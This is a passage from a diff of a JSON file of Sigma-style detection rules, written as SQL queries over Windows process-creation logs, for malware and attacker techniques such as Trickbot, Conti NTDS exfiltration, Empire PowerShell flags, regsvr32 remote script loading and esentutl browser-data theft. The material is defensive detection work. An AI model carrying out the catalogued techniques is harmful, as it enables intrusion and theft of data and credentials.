(CommandLine LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR CommandLine LIKE '%-sd %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe%' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%vbscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%wmic %' ESCAPE '\\' OR CommandLine LIKE '%wmic.exe%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32.exe%' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%once%' ESCAPE '\\' AND CommandLine LIKE '%00:00%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_hide_services_via_set_service.yml" + "filename": 
"proc_creation_win_schtasks_one_time_only_midnight_task.yml" }, { - "title": "PUA - 3Proxy Execution", - "id": "f38a82d2-fba3-4781-b549-525efbec8506", - "status": "experimental", - "description": "Detects the use of 3proxy, a tiny free proxy server", + "title": "Trickbot Malware Activity", + "id": "58bf96d9-ff5f-44bd-8dcc-1c4f79bf3a27", + "status": "stable", + "description": "Detects Trickbot malware process tree pattern in which \"rundll32.exe\" is a parent of \"wermgr.exe\"", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1572" + "attack.execution", + "attack.t1559" ], "falsepositives": [ - "Administrative activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\3proxy.exe' ESCAPE '\\' OR Description = '3proxy - tiny proxy server' OR CommandLine LIKE '%.exe -i127.0.0.1 -p%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\wermgr.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%DllRegisterServer%' ESCAPE '\\')" ], - "filename": "proc_creation_win_pua_3proxy_execution.yml" + "filename": "proc_creation_win_malware_trickbot_wermgr.yml" }, { - "title": "Remote Access Tool - LogMeIn Execution", - "id": "d85873ef-a0f8-4c48-a53a-6b621f11729d", + "title": "Suspicious JavaScript Execution Via Mshta.EXE", + "id": "67f113fa-e23d-4271-befa-30113b3e08b1", "status": "test", - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer 
are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", - "author": "frack113", + "description": "Detects execution of javascript code using \"mshta.exe\".", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.defense_evasion", + "attack.t1218.005" ], "falsepositives": [ - "Legitimate use" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description = 'LMIGuardianSvc' OR Product = 'LMIGuardianSvc' OR Company = 'LogMeIn, Inc.'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND CommandLine LIKE '%javascript%' ESCAPE '\\')" ], - "filename": "proc_creation_win_remote_access_tools_logmein.yml" + "filename": "proc_creation_win_mshta_javascript.yml" }, { - "title": "UAC Bypass Using Event Viewer RecentViews", - "id": "30fc8de7-d833-40c4-96b6-28319fbc4f6c", + "title": "HackTool - RedMimicry Winnti Playbook Execution", + "id": "95022b85-ff2a-49fa-939a-d7b8f56eeb9b", "status": "test", - "description": "Detects the pattern of UAC Bypass using Event Viewer RecentViews", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects actions caused by the RedMimicry Winnti playbook a automated breach emulations utility", + "author": "Alexander Rausch", "tags": [ + "attack.execution", "attack.defense_evasion", - "attack.privilege_escalation" + "attack.t1106", + "attack.t1059.003", + "attack.t1218.011" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%\\\\Event Viewer\\\\RecentViews%' ESCAPE '\\' OR CommandLine LIKE '%\\\\EventV~1\\\\RecentViews%' ESCAPE 
'\\') AND CommandLine LIKE '%>%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%gthread-3.6.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\tmp.bat%' ESCAPE '\\' OR CommandLine LIKE '%sigcmm-2.4.dll%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_uac_bypass_eventvwr_recentviews.yml" + "filename": "proc_creation_win_hktl_redmimicry_winnti_playbook.yml" }, { - "title": "Winnti Malware HK University Campaign", - "id": "3121461b-5aa0-4a41-b910-66d25524edbb", + "title": "Conti NTDS Exfiltration Command", + "id": "aa92fd02-09f2-48b0-8a93-864813fb8f41", "status": "test", - "description": "Detects specific process characteristics of Winnti malware noticed in Dec/Jan 2020 in a campaign against Honk Kong universities", - "author": "Florian Roth (Nextron Systems), Markus Neis", + "description": "Detects a command used by conti to exfiltrate NTDS", + "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002", - "attack.g0044" + "attack.collection", + "attack.t1560" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((ParentProcessName LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\hpqhvind.exe%' ESCAPE '\\') AND NewProcessName LIKE 'C:\\\\ProgramData\\\\DRM%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\ProgramData\\\\DRM%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\wmplayer.exe' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\Test.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\wmplayer.exe' ESCAPE '\\') OR NewProcessName LIKE 'C:\\\\ProgramData\\\\DRM\\\\CLR\\\\CLR.exe' ESCAPE '\\' OR (ParentProcessName LIKE 'C:\\\\ProgramData\\\\DRM\\\\Windows%' ESCAPE '\\' 
AND NewProcessName LIKE '%\\\\SearchFilterHost.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%7za.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\\\C$\\\\temp\\\\log.zip%' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_winnti_mal_hk_jan20.yml" + "filename": "proc_creation_win_malware_conti_7zip.yml" }, { - "title": "Rundll32 InstallScreenSaver Execution", - "id": "15bd98ea-55f4-4d37-b09a-e7caa0fa2221", - "status": "experimental", - "description": "An attacker may execute an application as a SCR File using rundll32.exe desk.cpl,InstallScreenSaver", - "author": "Christopher Peacock @securepeacock, SCYTHE @scythe_io, TactiKoolSec", + "title": "Tor Client/Browser Execution", + "id": "62f7c9bf-9135-49b2-8aeb-1e54a6ecc13c", + "status": "test", + "description": "Detects the use of Tor or Tor-Browser to connect to onion routing networks", + "author": "frack113", "tags": [ - "attack.t1218.011", - "attack.defense_evasion" + "attack.command_and_control", + "attack.t1090.003" ], "falsepositives": [ - "Legitimate installation of a new screensaver" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND CommandLine LIKE '%InstallScreenSaver%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\tor.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Tor Browser\\\\Browser\\\\firefox.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_rundll32_installscreensaver.yml" + "filename": "proc_creation_win_browsers_tor_execution.yml" }, { - "title": "Compress Data and Lock With Password for Exfiltration With WINZIP", - "id": "e2e80da2-8c66-4e00-ae3c-2eebd29f6b6d", + "title": "Possible Shim Database Persistence via sdbinst.exe", + "id": 
"517490a7-115a-48c6-8862-1a481504d5a8", "status": "test", - "description": "An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities", - "author": "frack113", + "description": "Detects installation of a new shim using sdbinst.exe. A shim can be used to load malicious DLLs into applications.", + "author": "Markus Neis", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1546.011" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%winzip.exe%' ESCAPE '\\' OR CommandLine LIKE '%winzip64.exe%' ESCAPE '\\') AND CommandLine LIKE '%-s\"%' ESCAPE '\\' AND (CommandLine LIKE '% -min %' ESCAPE '\\' OR CommandLine LIKE '% -a %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sdbinst.exe' ESCAPE '\\' AND CommandLine LIKE '%.sdb%' ESCAPE '\\') AND NOT (CommandLine LIKE '%iisexpressshim.sdb%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_winzip_password_compression.yml" + "filename": "proc_creation_win_sdbinst_shim_persistence.yml" }, { - "title": "Remote Access Tool - Anydesk Execution From Suspicious Folder", - "id": "065b00ca-5d5c-4557-ac95-64a6d0b64d86", + "title": "Suspicious Mshta.EXE Execution Patterns", + "id": "e32f92d1-523e-49c3-9374-bdb13b46a3ba", "status": "experimental", - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with 
other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects suspicious mshta process execution patterns", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.execution", + "attack.t1106" ], "falsepositives": [ - "Legitimate use of AnyDesk from a non-standard folder" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\AnyDesk.exe' ESCAPE '\\' OR Description = 'AnyDesk' OR Product = 'AnyDesk' OR Company = 'AnyDesk Software GmbH') AND NOT ((NewProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%Program Files (x86)\\\\AnyDesk%' ESCAPE '\\' OR NewProcessName LIKE '%Program Files\\\\AnyDesk%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND ((ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') AND (CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))) OR ((NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') OR 
(CommandLine LIKE '%.htm%' ESCAPE '\\' OR CommandLine LIKE '%.hta%' ESCAPE '\\') OR (CommandLine LIKE '%mshta.exe' ESCAPE '\\' OR CommandLine LIKE '%mshta' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_remote_access_tools_anydesk_susp_exec.yml" + "filename": "proc_creation_win_mshta_susp_pattern.yml" }, { - "title": "Suspicious RDP Redirect Using TSCON", - "id": "f72aa3e8-49f9-4c7d-bd74-f8ab84ff9bbb", + "title": "Regsvr32 Anomaly", + "id": "8e2b24c9-4add-46a0-b4bb-0057b4e6187d", + "status": "experimental", + "description": "Detects various anomalies in relation to regsvr32.exe", + "author": "Florian Roth (Nextron Systems), oscd.community, Tim Shelton", + "tags": [ + "attack.defense_evasion", + "attack.t1218.010", + "car.2019-04-002", + "car.2019-04-003" + ], + "falsepositives": [ + "Unknown" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%/i:%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND CommandLine LIKE '%scrobj.dll' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%/i:%' ESCAPE '\\' AND CommandLine LIKE '%ftp%' ESCAPE '\\' AND CommandLine LIKE '%scrobj.dll' ESCAPE '\\') OR ((NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') AND ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' AND CommandLine LIKE 
'%..\\\\..\\\\..\\\\Windows\\\\System32\\\\regsvr32.exe %' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\Local%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public%' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (CommandLine LIKE '%.jpg' ESCAPE '\\' OR CommandLine LIKE '%.jpeg' ESCAPE '\\' OR CommandLine LIKE '%.png' ESCAPE '\\' OR CommandLine LIKE '%.gif' ESCAPE '\\' OR CommandLine LIKE '%.bin' ESCAPE '\\' OR CommandLine LIKE '%.tmp' ESCAPE '\\' OR CommandLine LIKE '%.temp' ESCAPE '\\' OR CommandLine LIKE '%.txt' ESCAPE '\\'))) AND NOT (((CommandLine LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\WebEx\\\\WebEx64\\\\Meetings\\\\atucfobj.dll%' ESCAPE '\\')) OR (ParentProcessName LIKE 'C:\\\\Program Files\\\\Box\\\\Box\\\\FS\\\\streem.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\Program Files\\\\Box\\\\Box\\\\Temp\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%/s C:\\\\Windows\\\\System32\\\\RpcProxy\\\\RpcProxy.dll' ESCAPE '\\')))" + ], + "filename": "proc_creation_win_regsvr32_anomalies.yml" + }, + { + "title": "Potential CVE-2021-41379 Exploitation Attempt", + "id": "af8bbce4-f751-46b4-8d91-82a33a736f61", "status": "test", - "description": "Detects a suspicious RDP session redirect using tscon.exe", + "description": "Detects potential exploitation attempts of CVE-2021-41379 (InstallerFileTakeOver), a local privilege escalation (LPE) vulnerability where the attacker spawns a \"cmd.exe\" process as a child of Microsoft Edge elevation service \"elevation_service\" with \"LOCAL_SYSTEM\" rights", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1563.002", - "attack.t1021.001", - "car.2013-07-002" + "attack.privilege_escalation", + "attack.t1068" ], 
"falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% /dest:rdp-tcp:%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE', 'pwsh.dll')) AND (ParentProcessName LIKE '%\\\\elevation\\_service.exe' ESCAPE '\\' AND IntegrityLevel = 'System'))" ], - "filename": "proc_creation_win_tscon_rdp_redirect.yml" + "filename": "proc_creation_win_exploit_cve_2021_41379.yml" }, { - "title": "PUA - NPS Tunneling Tool Execution", - "id": "68d37776-61db-42f5-bf54-27e87072d17e", + "title": "Esentutl Steals Browser Information", + "id": "6a69f62d-ce75-4b57-8dce-6351eb55b362", "status": "experimental", - "description": "Detects the use of NPS, a port forwarding and intranet penetration proxy server", - "author": "Florian Roth (Nextron Systems)", + "description": "One way Qbot steals sensitive information is by extracting browser data from Internet Explorer and Microsoft Edge by using the built-in utility esentutl.exe", + "author": "frack113", "tags": [ - "attack.command_and_control", - "attack.t1090" + "attack.collection", + "attack.t1005" ], "falsepositives": [ "Legitimate use" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\npc.exe' ESCAPE '\\' OR (CommandLine LIKE '% -server=%' ESCAPE '\\' AND CommandLine LIKE '% -vkey=%' ESCAPE '\\' AND CommandLine LIKE '% -password=%' ESCAPE '\\') OR CommandLine LIKE '% -config=npc%' ESCAPE '\\' OR ((Hashes LIKE '%MD5=AE8ACF66BFE3A44148964048B826D005%' ESCAPE '\\' OR Hashes LIKE '%SHA1=CEA49E9B9B67F3A13AD0BE1C2655293EA3C18181%' ESCAPE '\\' OR Hashes LIKE 
'%SHA256=5A456283392FFCEEEACA3D3426C306EB470304637520D72FED1CC1FEBBBD6856%' ESCAPE '\\') OR md5 = 'ae8acf66bfe3a44148964048b826d005' OR sha1 = 'cea49e9b9b67f3a13ad0be1c2655293ea3c18181' OR sha256 = '5a456283392ffceeeaca3d3426c306eb470304637520d72fed1cc1febbbd6856')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR OriginalFileName = 'esentutl.exe') AND (CommandLine LIKE '%/r%' ESCAPE '\\' OR CommandLine LIKE '%-r%' ESCAPE '\\') AND CommandLine LIKE '%\\\\Windows\\\\WebCache%' ESCAPE '\\')" ], - "filename": "proc_creation_win_pua_nps.yml" + "filename": "proc_creation_win_esentutl_webcache.yml" }, { - "title": "Suspicious Modification Of Scheduled Tasks", - "id": "1c0e41cd-21bb-4433-9acc-4a2cd6367b9b", + "title": "Script Event Consumer Spawning Process", + "id": "f6d1dd2f-b8ce-40ca-bc23-062efb686b34", "status": "experimental", - "description": "Detects when an attacker tries to modify an already existing scheduled tasks to run from a suspicious location\nAttackers can create a simple looking task in order to avoid detection on creation as it's often the most focused on\nInstead they modify the task after creation to include their malicious payload\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects a suspicious child process of Script Event Consumer (scrcons.exe).", + "author": "Sittikorn S", "tags": [ "attack.execution", - "attack.t1053.005" + "attack.t1047" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /Change %' ESCAPE '\\' AND CommandLine LIKE '% /TN %' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE 
'%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%appdata\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%comspec\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%localappdata\\%%' ESCAPE '\\') AND (CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%bitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%bash.exe%' ESCAPE '\\' OR CommandLine LIKE '%bash %' ESCAPE '\\' OR CommandLine LIKE '%scrcons%' ESCAPE '\\' OR CommandLine LIKE '%wmic %' ESCAPE '\\' OR CommandLine LIKE '%wmic.exe%' ESCAPE '\\' OR CommandLine LIKE '%forfiles%' ESCAPE '\\' OR CommandLine LIKE '%scriptrunner%' ESCAPE '\\' OR CommandLine LIKE '%hh.exe%' ESCAPE '\\' OR CommandLine LIKE '%hh %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE 
'%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msbuild.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_schtasks_change.yml" + "filename": "proc_creation_win_scrcons_susp_child_process.yml" }, { - "title": "Execution via stordiag.exe", - "id": "961e0abb-1b1e-4c84-a453-aafe56ad0d34", + "title": "HackTool - Empire PowerShell Launch Parameters", + "id": "79f4ede3-402e-41c8-bc3e-ebbf5f162581", "status": "test", - "description": "Detects the use of stordiag.exe to execute schtasks.exe systeminfo.exe and fltmc.exe", - "author": "Austin Songer (@austinsonger)", + "description": "Detects suspicious powershell command line parameters used in Empire", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate usage of stordiag.exe." 
+ "Other tools that incidentally use the same command line parameters" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\stordiag.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\fltmc.exe' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'c:\\\\windows\\\\system32\\\\%' ESCAPE '\\' OR ParentProcessName LIKE 'c:\\\\windows\\\\syswow64\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '% -NoP -sta -NonI -W Hidden -Enc %' ESCAPE '\\' OR CommandLine LIKE '% -noP -sta -w 1 -enc %' ESCAPE '\\' OR CommandLine LIKE '% -NoP -NonI -W Hidden -enc %' ESCAPE '\\' OR CommandLine LIKE '% -noP -sta -w 1 -enc%' ESCAPE '\\' OR CommandLine LIKE '% -enc SQB%' ESCAPE '\\' OR CommandLine LIKE '% -nop -exec bypass -EncodedCommand %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_stordiag_susp_child_process.yml" + "filename": "proc_creation_win_hktl_empire_powershell_launch.yml" }, { - "title": "Gpg4Win Decrypt Files From Suspicious Locations", - "id": "e1e0b7d7-e10b-4ee4-ac49-a4bda05d320d", + "title": "Suspicious MsiExec Embedding Parent", + "id": "4a2a2c3e-209f-4d01-b513-4155a540b469", "status": "experimental", - "description": "Detects usage of the Gpg4win to decrypt files located in suspicious locations from CLI", - "author": "Nasreddine Bencherchali (Nextron Systems), X__Junior", + "description": "Adversaries may abuse msiexec.exe to proxy the execution of malicious payloads", + "author": "frack113", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.t1218.007", + "attack.defense_evasion" ], "falsepositives": [ - "Legitimate use" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\gpg2.exe' ESCAPE '\\' OR 
Product = 'GNU Privacy Guard (GnuPG)' OR Company = 'g10 Code GmbH') AND CommandLine LIKE '%-passphrase%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\temp%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') AND ParentCommandLine LIKE '%MsiExec.exe%' ESCAPE '\\' AND ParentCommandLine LIKE '%-Embedding %' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Program Files\\\\SplunkUniversalForwarder\\\\bin\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%\\\\DismFoDInstall.cmd%' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\MsiExec.exe -Embedding %' ESCAPE '\\' AND ParentCommandLine LIKE '%Global\\\\MSI0000%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_gpg4win_susp_usage.yml" + "filename": "proc_creation_win_msiexec_embedding.yml" }, { - "title": "Elise Backdoor Activity", - "id": "e507feb7-5f73-4ef6-a970-91bb6f6d744f", + "title": "HackTool - Impacket Tools Execution", + "id": "4627c6ae-6899-46e2-aa0c-6ebcb1becd19", "status": "test", - "description": "Detects Elise backdoor activity used by APT32", - "author": "Florian Roth (Nextron Systems), Nasreddine 